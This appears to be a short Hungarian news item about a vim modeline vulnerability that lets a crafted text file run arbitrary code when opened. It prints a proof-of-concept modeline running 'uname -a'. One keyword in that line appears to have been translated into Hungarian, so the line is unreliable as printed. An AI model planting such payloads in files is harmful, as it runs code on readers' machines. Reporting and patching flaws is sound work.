Sebezhetőség a vimben

Egy biztonsági rést tettek közzé a vim szövegszerkesztőben, amely lehetővé teszi tetszőleges kód futtatását, amikor a szerkesztő megnyit egy szöveges fájlt.

Itt található az ártalmatlan uname -a parancsot végrehajtó fájl szövege

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("forrás! %"):fdl=0:fdt="

Egy javítás egy hozzáadott check_secure() hívás formájában már elérhető a vim és a neovim tárolókban.

Forrás: linux.org.ru

Hozzászólás